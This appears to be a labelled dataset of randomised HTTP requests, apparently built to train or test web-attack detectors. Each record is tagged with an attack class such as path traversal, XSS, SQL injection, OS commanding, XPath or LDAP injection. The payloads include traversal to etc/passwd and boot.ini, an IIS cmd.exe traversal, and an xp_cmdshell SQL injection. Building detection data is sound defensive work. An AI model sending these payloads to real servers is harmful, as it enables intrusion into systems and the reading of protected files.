Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45162
Start - Id: 45204
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 127.46.153.94
Connection: od2I20
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 125.250.245.160
Cookie: ehnjoeNoxkea2=163;fns8sAEisN=78327121;caOohumG=eod;ahoSiefhasoasd=nht;@2OQ4in=oo s~<o|w<|rvnS ss ;xbhsdt=insert
Cookie2: $Version="6"
Date: Fri, 09 Nov 07 04:58:36 UTC
ETag: W/"LyCJ_rPrQiUKw7_E"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Mon, 20 Apr 09 18:34:08 GMT
If-Unmodified-Since: Thu, 03 Jul 08 07:12:52 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Feb 09 18:41:00 CET
Max-Forwards: 28
MIME-Version: 1.6
Pragma: Tw=hrroue
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: kgnSre cyiN=afN9amf
Range: 706278-,584316-,-67
Referer: http://usiehNlg.ch/nsEkvee/oiif/mcfreos/i0em/je8la.cfm
TE: chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: st6cu0i7tnei9tseiye
UA-CPU: Sparc
UA-Disp: 749,556,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2083x0053
Via: 2.3 224.133.118.188
Transfer-Encoding: deflate
Upgrade: eimdea/6.6
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 12.15.76.12
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45204
Start - Id: 47526
class: XSS
GET /FexecyvNu/sclesOec/oWGTTkojM2LK3/e7gp/TOMLC5qT/suhm0/ex.css?enrCro=outp+igiwdn&krnullvFz=ia&ntia=9iaal%2FrAmmteIs+&csystemN86fA=5&i.ThS=pe&oadpe8edjOri=%3Cdiv++++style++%3D++%22+binding%3A++url%28%5Bhttp%3A%2F%2Fwww.geie.com%2Fscript%2Fppit.jsp%5D%29%3B+++%22+%3E&dz=oy3 HTTP/1.1
Host: www.iewe5e.biz
Connection: mindixs
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: 3='f'
Client-ip: 2.40.61.206
Cookie: GV2iVo=32399957;aAidr0y=1871713;passwdG7DRMQMsamxp_cb=47;mfabrnt3s= tswinntr'l;.ERUcfX=16948
Cookie2: $Version="545"
Date: Thu, 26 Feb 04 07:22:01 GMT
ETag: W/"-gXHqWTuyFHb9trO"
Expect: mAnknsm
From: eieolton@oosl.de
If-Modified-Since: Thu, 23 Feb 06 15:12:57 GMT
If-Unmodified-Since: Thu, 19 May 05 11:25:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 4415
MIME-Version: 0.2
Pragma: itb=s
Proxy-Authorization: Basic RWhzaWU6b05ub2U=
Authorization: Basic Y2dtbWk6c2lhcg==
Range: 924-,916951-
Referer: /aae8.tiff
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: g5wuVoSc http://www.lmndd.st
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: FTP/9.2 www.ouanydi.gif, HTTP/5.7 www.estaGi.tiff
Transfer-Encoding: deflate
Upgrade: atsa/8.3
Warning: 781 255.112.125.38 "ehmjCimcbjUud9qrtdru" 
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47526
Start - Id: 46348
class: PathTransversal
GET /dpa0SSlBUE58lJFYPQ/oSb/usrOgaVMB6select/tihpndrenr/ic9wy/n5u-Da/vKw2mhT/djDgkpcsSlKi1o_kWxU.bin?5ephh=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&9atf=e5yqanhyHenNw&y6nie0z=80634&dGdomiNhyeAetrs=phM+e&ne=e6K7Oq&xYhpoSR=feyEaincludenwFay&ac6rc=6970&ur=gTelfeoeISivmgsTaa&mttoobtz5ncittu=w0ua&arai2atfwl5nee=s%5Done5ei&SK_F=enlenhomeopinputAh6rr+npH&LfvdACKdt=4494468434 HTTP/1.0
Host: 141.93.154.194:80
Connection: close
Accept: video/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s1y-Ao;q=0.7, cr-iUrea;q=0.4, 8oaitysu-tT7ecep;q=0.8
Cache-Control: no-store
Client-ip: 51.115.37.124
Cookie2: $Version="19"
Date: Fri, 30 Apr 10 06:51:11 UTC
ETag: "8loGsYRk@@ghoB6Ow6"
Expect: jhTeC63t
If-Modified-Since: Mon, 14 Feb 05 03:50:35 CET
If-Match: "1wShDBD3.uZUumC.8f"
If-None-Match: *
If-Range: "xHEXf6S@P50SBwdk"
Max-Forwards: 416
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: http://www.AtTOieet.biz/tRRoatm6/zceo.ace
TE: deflate,trailers,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.9 (compatible; Konqueror/2.8; SunOS sun4u; ydetdgpkt; ieTNeo; rytwp)
UA-CPU: Sparc
UA-Pixels: 648x2225
Via: HTTP/6.5 10.254.153.19
Transfer-Encoding: deflate
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27

null

End - Id: 46348
Start - Id: 43709
class: OsCommanding
GET /iisadmpwd/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.n9rio54.net
Connection: r3mtni3
Accept: video/*, text/plain;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: 5nBepa-bnrrhh, g-hc;q=0.7, g-adr;q=0.8, tTraule2-U
Cache-Control: min-fresh=4
Client-ip: 131.122.223.243
Cookie: do=50804;iweyerclfmdooj=3095
Cookie2: $Version="1"
Date: Mon, 29 Dec 08 16:25:45 GMT
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Tue, 28 Mar 06 20:28:01 CET
If-Unmodified-Since: Tue, 19 Jul 05 09:48:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Apr 06 10:57:09 UTC
Max-Forwards: 13
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: tsoaT mieOyd9e=mWtlue
Authorization: Digest nonce
Range: 7008-71
Referer: /R8meca/teoe/mpishc.jsp
TE: gzip
User-Agent: Mozilla/9.0 (X11; U; Linux i386 9.8; et-el; rv:3.3.6) Gecko/98122436
UA-CPU: 68000
UA-Disp: 210,8217,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: tnhrdi; orzia=njLOxln
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 907 www.nh4nvqdc.htm "leoeodrceto" "Thu, 06 Dec 07 08:39:30 UTC"
X-Forwarded-For: 160.206.203.92
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43709
Start - Id: 42443
class: SqlInjection
GET /ncincludeUEe1Xinsertg/iw7abssfn/xnm/@8CQyvB9fvOGxincludex/ffw/ri.sh?cral=618&ftFbokcdGdO=qwer%27++++or+Newseo_v.Account%3D%27itto%40lx.com&dreOca=8Rmyl&iaehyftcnrodu=ahc&1bXaz=npAE.c&azW8=6400961&wntca7iiohyt=+ HTTP/1.1
Host: 93.121.197.94
Connection: keep-alive
Accept: text/html
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.9, deflate;q=0.9, identity, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.146.100.76
Cookie: m6ooniseoa=lutdh0laeeoiMtaz;u4d=iewaza5ai7u6mu3;c0ben=swEOoygno3hlxnsS1e;srn1h0cahebramd=0MuzI;uhotpnfu=$a;zlobl=rFeeoTeXe
Cookie2: $Version="1"
Date: Sun, 21 May 06 18:02:24 CET
ETag: W/"LkwkzQEbK9u4gXQa5I"
Expect: 100-continue
From: hraer@erUscu.ch
If-Modified-Since: Thu, 19 May 05 10:03:16 GMT
If-Unmodified-Since: Sun, 25 Apr 04 21:05:57 UTC
If-Match: *
If-None-Match: "sUmghx9.Fo4xOPb"
If-Range: Wed, 09 Jun 04 03:05:30 GMT
Max-Forwards: 89
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic cmRtbmU6OXd5cG4wZQ==
Range: 378414-80248,967-,-2698
Referer: http://hwulesf.be/osbos/ammt/po7ofgs.mp3
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: pmrYdtfp/6.5.7
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 4.8 www.rhcid.html
Transfer-Encoding: identity
Upgrade: irelm/1.0, pnd/5.9, apf/2.0, tndhu/6.2
Warning: 804 3.116.103.108 "ltdxdrissdd" "Wed, 08 Nov 06 17:00:19 UTC"
X-Forwarded-For: 222.68.170.108
X-Serial-Number: 630486475749117
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42443
Start - Id: 35036
class: SqlInjection
GET /Algal7ils/access_log0kfiakMxtermp5/auaeacont9i/U-p-xJaktQJ/ozPTNtxlqx5D08/idiht/logg/s4tiaeazreooenm/re9lab/1eHtm/is0vnol/BmefiehdiAjtc6.exe?enMtctht=%27%3BEXEC+master.dbo.xp_cmdshell+++++%27cmd.exe&ntarbprunf96ntm=37A&uisrbEbs=nsTAfcxHif HTTP/1.0
Host: www.eXeiioenee.com
Connection: close
Accept: */*
Accept-Charset: windows-1252, windows-1254, cp-936, windows-1253;q=0.0
Accept-Encoding: 
Accept-Language: kaaxtfei-2o, 0-q;q=0.5
Cache-Control: max-stale=64
Client-ip: 70.74.68.114
Cookie: -StjRnAXMglL=4976008343;ottesegzt=288487;bformHHgbFwNIRbetween=location0&
Date: Tue, 03 Oct 06 01:29:17 GMT
ETag: W/"0@NBRWxhqqgere4xA"
If-Modified-Since: Mon, 18 Apr 05 23:26:23 CET
If-Unmodified-Since: Fri, 02 Feb 07 01:03:20 UTC
If-Match: "pqyLo..u@gR_YOMkbEjm"
If-None-Match: "FTM9O3AVyJKps7G"
If-Range: *
Max-Forwards: 124
Referer: http://eUhSitn.com/7vlYa/ebtn.asmx
TE: gzip
User-Agent: 5tRyurnEces7utetn
UA-CPU: PowerPC
UA-Color: color8
Transfer-Encoding: gzip

null

End - Id: 35036
Start - Id: 46002
class: PathTransversal
PUT /otrdardnio7i/sluetmislaqkchvez1xL/o6fsoceeeyasSuwx/s0/aceu7mk/DJ3Z47/eoxaose3ok6ay/tEtngoo3o/tiz/xK83mvdX5.BTcL.jpg? HTTP/1.0
Content-Length: 285
Content-Language: eih,H0a,i
Content-Encoding: deflate
Content-Location: /hdtidZA/teTno/sawra.bin
Content-MD5: M2pkRW5IYTRQZ2hmZ29uaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jun 06 05:40:35 CET
Last-Modified: Sat, 12 Dec 09 04:39:05 UTC
Host: 150.35.152.1
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: cp-936, x-mac-hebrew, iso-8859-2, windows-1251;q=0.5, iso-8859-7
Accept-Encoding: *;q=0.7
Accept-Language: t-ecdo;q=0.4
Cache-Control: w6m9w=nlumse
Cookie: ggeaetuet=Nzh;5seewo=4715;eva2e=85;nIs9iEt1cd8el=etechoinnetne%oEasfhttp6n;enernsntuleeb3e=f:\winnt\boot.ini;0dgzstersetos=rhEt17$e8raby
Cookie2: $Version="120"
Date: Mon, 09 May 05 04:53:24 UTC
Expect: 100-continue
From: tKcUisc@antaldEso0.cz
If-Modified-Since: Tue, 29 Aug 06 17:10:19 UTC
If-Match: *
Max-Forwards: 8
Pragma: wy=oNsu
Authorization: Basic eEVlblduZTprcWpyOXQ=
Referer: http://www.alett.uk/estys/tcvl.exe
Trailer: Pragma
User-Agent: aoenydshnnmwccmeYeeE
UA-OS: Win98
Via: 4.0 www.gheiIen.gif, 8.0 65.221.197.235:39
Transfer-Encoding: gzip

noae= EHcatc&nmtCeaU90en=A5oOQ4aet&tottn=7dbgpasswdi&dr3tp1ieMsucssd=i?oDAn%anlm&ei=nntp8) exZ&7iInhAnglaabstu=33868017&AniguOeara=iFWzmhTpYHz0&ceiacvef=646490999&ut5hsn7gijs=6mZvw6pf&7lgdaitjchtu=httTwindow.openosock_stream-o2hf&i7gcitdzEi0its=3ny&RndcIh=758&2srkdinotdin9ur=wAv

End - Id: 46002
Start - Id: 48701
class: XPathInjection
POST /xihnaRRZvzBR/oGbAYEM.iewpVG/seCHqct-q/o0TB9Msm7HfHCAS/m_83rVWzm1r/euhlCoTaaiuci3mho/kKd/efetmzdsygiR3me.tiff? HTTP/1.1
Content-Length: 380
Content-Language: noda,fts,aai5eu
Content-Encoding: compress
Content-Location: http://www.sLezssp.st/TRi6e0u/omei/5gjs9te.txt
Content-MD5: eTZlbHNhNWkwemdsc3N3ag==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Nov 08 10:11:10 GMT
Last-Modified: Sat, 10 Jan 09 12:23:06 GMT
Host: www.Iter5.be
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, identity;q=0.3
Accept-Language: IkiTewgo-rtoanR30;q=0.5, Eqeaense-liltjse, usnes-tehH
Cache-Control: no-transform
Client-ip: 159.42.128.3
Cookie: huuae=bosexect;cat7rVha4=taem t6 T3;@Wx0c=~6techoleisucst0insertrIhttpsalr;Eorr= ie tshobhcV
Cookie2: $Version="879"
Date: Fri, 13 Oct 06 07:02:34 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: Le0arhj=himlintn
From: atds@noHasdc.cz
If-Modified-Since: Sat, 07 Aug 04 11:49:23 UTC
If-Unmodified-Since: Wed, 23 Sep 09 22:30:20 GMT
If-Match: *
If-None-Match: "trprGR5jxF_KLyH2Pi_"
If-Range: Sat, 06 Aug 05 09:41:46 CET
Max-Forwards: 2258
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZnBnd3Q6b25sZVg=
Range: 569156-2482
Referer: /omeWOW/lvan/aaetosee/tsoasx/riigh9.pl
TE: deflate
Trailer: Expect
User-Agent: tvyPIcB2 http://www.ewZylfg.st
UA-CPU: Sparc
UA-Disp: 527,267,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 640x9904
Via: HTTP/0.7 16.101.160.147, 4.3 www.feteocs.css, HTTP/4.6 www.8nuTd.tiff:45862
Transfer-Encoding: osspud
Upgrade: phe/8.1, Jtnat/6.7
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Forwarded-For: 243.139.91.251
X-Serial-Number: 70312364698710750668
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8eaibiaweObL=45504574&niag=E-r(yeri&t3b=y5-J8m0ri3&@E2kJdocumentPinGchild-j=wiwirhoaDNtihrie&enE=590  or fsbsn/n/l/child::node()[position()=09] or 3777=&kUformZ_6=ne&eNpq=osfoi9auPht&deleeh7sycg=nhLht7o25vdenm&aRpoB5Eaeeo=e]same&mdtiseAtehene=3&e0eepadntaLel=086&q3ng4-r=rhtpassreplace:&c9uneLottqimodg= l&K7RK=timgek&ahsosoet9oai5u=lRahesmopt-'s

End - Id: 48701
Start - Id: 37995
class: LdapInjection
GET /rStQc.gif?D5systemZ=15846&yEi1pmlnrap=12609515&efor=3258%29%28%26%28objectClass%3Dstno%29%28%7C%28sn+++%3Dod3a%29%28cn%3Dbiyy+++++J*%29%29 HTTP/1.0
Host: 186.232.213.243:80
Connection: keep-alive
Accept: video/mpeg;q=0.6, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip;q=0.2
Accept-Language: mhys26ue-opm7, enqicn-bt
Cache-Control: no-transform
Client-ip: 115.116.216.130
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="53"
Date: Fri, 26 Jan 07 08:20:48 UTC
ETag: W/"dKKZ-cddyT5zsZX1yuM"
Expect: 100-continue
From: trtssn1@Ndseosl4.gov
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Thu, 05 Jul 07 17:59:47 CET
If-Match: "8aKcEsg1XHUUpGgd"
If-None-Match: *
If-Range: Sun, 14 Jun 09 08:17:39 CET
Max-Forwards: 1
MIME-Version: 4.1
Pragma: 5='4o8trk5m'
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: Digest response="dAd5FcB57E0C5AB9ea90BC841f0938cc"
Range: -90
Referer: http://www.cinmos.st/arn5h/bdusnD/1aeehra.jsp
TE: chunked,trailers,trailers
Trailer: TE
User-Agent: Mozilla/4.2 (Windows; U; Windows NT 0.7; Bn-ei; rv:5.7.2) Gecko/90724119
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 880x8476
Via: 0.7 www.ctong.html, HTTP/8.0 www.n6sniitf.jpg, ryesU/9.9 47.0.215.6
Transfer-Encoding: compress
Upgrade: 9aaia/6.6
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37995
Start - Id: 45155
class: PathTransversal
GET ////? HTTP/1.0
Host: 134.228.235.211
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: shift_jis;q=0.8, x-mac-chinesesimp;q=0.6, windows-1255
Accept-Encoding: 
Accept-Language: 1c-o;q=0.6, esrjmsa-aabeResp;q=0.6, hawme-oso4oao
Cache-Control: max-stale
Client-ip: 168.50.166.68
Cookie: xetinceeiae=43;owrrttiit6rrOes=9;eskjTy=7rrajyehe
Cookie2: $Version="70"
Date: Thu, 22 Oct 09 23:03:20 UTC
ETag: W/"Ad6SHvLZ2aQiVBoxCHk"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Fri, 30 Jul 04 17:35:22 CET
If-Unmodified-Since: Fri, 18 Feb 05 14:07:59 UTC
If-Match: "R8jeAAwLGcjhdVU"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 454
Pragma: no-cache
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: NTLM Nm9uZ3pybHUyYWZwOXJvQWtPaTdrcmdzb2ZlYTJ1ZDdENEN0ag==
Referer: /rt8n/pleap/sartrhc/IptMO/tnh5res.sh
TE: chunked;q=0.7,deflate;q=0.6
Trailer: Date
User-Agent: ograee/4.5.8.9
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: z5me
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45155
Start - Id: 45531
class: PathTransversal
GET /aptnceI8hMusTa/rPY5gq/8GcTvXX/eaxodcyljkrCtnw/2M-OYZHY0vFsTFQReJwA/r0/eBDwhztpC9f.jpeg?Ehilfegcoh=83&_uanc-=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&tbs-tD=d5dBu.VMR&jrhn8zszeya5tE=dBMkN0vfY4V&reh2fehe5nw=3125124&3xeaCoSchSviELl=drgop&eh=gd+9%29inctl%24&fKOR-Ri.WNTp=7863&abhord=098003&rcpCPK7bhW8=li HTTP/1.0
Host: 124.40.27.220
Connection: close
Accept: text/xml;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, gzip;q=0.2, compress;q=0.8, deflate;q=0.1
Accept-Language: tgpdite-e, qha9esxi-Sjpv
Cache-Control: min-fresh=4
Client-ip: 228.114.110.173
Cookie: sQ7DK0ke=69607322;u_if=0242135
Cookie2: $Version="02"
Date: Tue, 30 Mar 10 02:31:50 GMT
ETag: "av.vRdQd-D-3_g1eS-h"
Expect: ax8lncn
From: aFhd@iesknmut3c.net
If-Modified-Since: Sun, 23 Mar 08 07:51:40 GMT
If-Unmodified-Since: Sat, 22 Jan 05 05:09:12 GMT
If-Match: *
If-None-Match: *
If-Range: "o-RPy4fdvX7UrgA3X"
Max-Forwards: 9
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM aDRlZGZzcmhvYXlpdVV0aW41czVzc282cnI2ZkFrdGx0aQ==
Range: 903-3,3-4324,-8
Referer: http://Snit.it/euJzt/EgaOee/a9rats/az8ye/leteni.htm
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: xgc6uSB http://www.iaeeetea.com
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 589x0586
Via: 6.5 www.tsIl.jpeg, HTTP/7.7 14.128.46.32, 1.6 227.195.95.56
Transfer-Encoding: identity
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45531
Start - Id: 42766
class: SqlInjection
PUT /oFWOkFHneTTag7Z/qeeeaou/yoMtZkRQ1Jqk/dQsqI2CT/Xm8select4x/aat/@access_logbL6JI8SRbm-qls/dVs/oHIPg.RnPgDDnF.cfm? HTTP/1.0
Content-Length: 174
Content-Language: od7ot
Content-Encoding: deflate
Content-Location: /ae9gedeo/a1rTe.conf
Content-MD5: aWFyQWUzdEV0dHRvYWFlcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Jun 08 22:11:52 GMT
Last-Modified: Tue, 19 Jul 05 20:39:45 CET
Host: www.h7rwhu6ht.be:10875
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: hjr=cadtT
Client-ip: 123.150.140.96
Cookie: eQcI8=and  0<>(select count(*)    from 6z where    xlrpntqt<>);ezc=312499154
Cookie2: $Version="22"
Date: Thu, 17 Dec 09 04:25:40 UTC
ETag: W/"4syG_ceHAAG5p1m.jr"
Expect: 100-continue
From: anpaN@pbason.biz
If-Modified-Since: Thu, 03 Sep 09 10:00:06 GMT
If-Unmodified-Since: Sat, 20 Mar 10 20:15:37 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 24 Mar 05 18:12:00 UTC
Max-Forwards: 594
Pragma: no-cache
Proxy-Authorization: Basic cnRjdGlIZDoxbnV0
Authorization: NTLM ZXJob25vdTRzNnpldWlzaEJoSnRzajJlZWx4dHRzNXJkY21hYWViazBycg==
Range: -40,8745-
Referer: /imtwo/EiAa/hdmco.nsf
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.9 (compatible; Konqueror/4.2; SunOS sun4u; rm6su)
UA-Disp: 110,8354,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 648x107
Via: HTTP/4.3 116.194.100.225:01704, FTP/7.2 www.srhe.shtml
Transfer-Encoding: identity
Upgrade: Hic/2.5, elet/9.7
Warning: 191 www.mbisc.gif "soxseOi" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ngv7iv=9760886&s_where07-C3=dty7yzRs8IC&7otc=n&pstdesdiay=v9h&coowd=smrioevtnh&se'0u8i&nacnb=r6qNMwWL4h&nnhrhdo8XRerd=lort &a.eFIwqRam=0038&owiDci6Moa5=fh&ec9ogusT=001406

End - Id: 42766
Start - Id: 38629
class: LdapInjection
GET /opNMPsVUvhjy/su5a/jxehwylaehe8ie/7IXwBzPLQU4/njUlSsqQLpc/7DGUC7B4xwUV-.htm?reeH8=tuciBR5cVVk&BfoUz@.y=oftgpRloro8&Orhttp4ds=94%29%28%26%28objectClass%3Duw4%29%28%7C%28sn+++%3D++++smoe%29%28cn%3Dnngr+++J*%29%29&u8af0iDetsn1=rc%2Frh+%29e8%40o&p783lontU=ri HTTP/1.0
Host: 15.104.248.245
Connection: adkta
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: wife-Trka4r;q=0.7, he8nfosi-emhl9hni;q=0.6
Cache-Control: max-age=7
Client-ip: 146.74.202.69
Cookie: ndu=58976;iecw25z=8296253953;latCL6mY-=630;iRvdeiNuuaej=9863;hbltCgBedOYDTeu=eVjqHmc6T
Cookie2: $Version="225"
Date: Wed, 04 Mar 09 07:19:00 UTC
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Fri, 18 Feb 05 03:24:27 CET
If-Unmodified-Since: Sun, 18 Sep 05 08:53:45 GMT
If-Match: "j8tBmasV8PoJm6Eupz.T"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: Sat, 17 Nov 07 05:10:21 UTC
Max-Forwards: 1
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: 5r7i ideon=rrdeiim
Range: 2-163
Referer: http://www.etddoas.uk/eqh5ej/r5ehrdt/oljSr3n2/571sa/aqatRs.php3
TE: gzip;q=0.8
Trailer: Accept
User-Agent: azau (oN2S5UF; edUV@sXff2; hQuuqqi@; 5FU4-KDvrt; h_sgHI7.)
UA-CPU: StrongARM
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 9.2 www.rfxEnct.shtml
Transfer-Encoding: identity
Upgrade: hiaeAa/4.4, r8ta/3.6, rte3z/8.6, iadrea/0.5, ia5gs/1.7
Warning: 385 www.ietrrth1.htm "wefuh94ogoiYectles" 
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 325446948
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38629
Start - Id: 38184
class: LdapInjection
GET /3e6rhlyneOajuitr/Z26/e7PWiAqbwu9o/RdzyLPH.Lc2j60input/pq-J.cgi?matnIzne=d6wX-&egfde=93&vqh6unGn=b&autoexec8dXvG=%29+++%28+++%7C%28displayName%3Dhad*%29+++%28name++%3D+had*%29%28+++mail%3Dhad*++++%29 HTTP/1.1
Host: 165.96.238.105
Connection: close
Accept: video/*, audio/*, image/*
Accept-Charset: iso-8859-2, iso-8859-8-i;q=0.7, iso-8859-2;q=0.5
Accept-Encoding: *
Accept-Language: am-3i, hh-widyl1, adDpjlu-6j;q=0.7, Ad-msnNL;q=0.3
Cache-Control: min-fresh=42
Client-ip: 238.249.58.159
Cookie: checrwuf5=3015799;lrerihvt1e=meif
Cookie2: $Version="22"
Date: Thu, 29 Nov 07 21:22:13 CET
ETag: W/"cvMbx4sfux4.USQJj"
Expect: ni4g=eota
From: nethi@otsenrjp.biz
If-Modified-Since: Tue, 11 Mar 08 22:01:25 GMT
If-Unmodified-Since: Thu, 14 Jun 07 18:11:24 UTC
If-Match: *
If-None-Match: "rcGcf5-ncVqlFbK8"
If-Range: "qqk1eSLudV2R98BwYA"
Max-Forwards: 19
MIME-Version: 7.1
Pragma: EsRS1m=dT7u5i8c
Proxy-Authorization: Basic dGlvbDp6c2xibmU=
Authorization: Basic b3JucTpiUkV2ZTduZA==
Range: -49,281-
Referer: /nuz8icl/0naa.txt
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: neutiz4/0.1.5.9.8
UA-CPU: PowerPC
UA-Disp: 747,821,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5505x7135
Via: HTTP/4.9 www.ntt4eA.jpg:06
Transfer-Encoding: deflate
Upgrade: rho/1.8, riptm/6.0
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 276586158043
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38184
Start - Id: 44968
class: PathTransversal
GET /Eyue/3he/lC/M-/ahsx5dlbrfjdnu3la1t/fuPxKEwzUUKg1AM./tY04UpJWJUlSEpR4/m9oeKQafVTLBUw@f-b..html?aORmftt=bXPbX5JMCEp&bo4enavomte=tm2tlloe&fhrTemdtedt=.%2F..%2F.%2F..%2F&hhleaspDae=462497 HTTP/1.0
Host: www.nadEC.ch:18808
Connection: ctettim3
Accept: image/png;q=0.3, audio/*, application/rtf
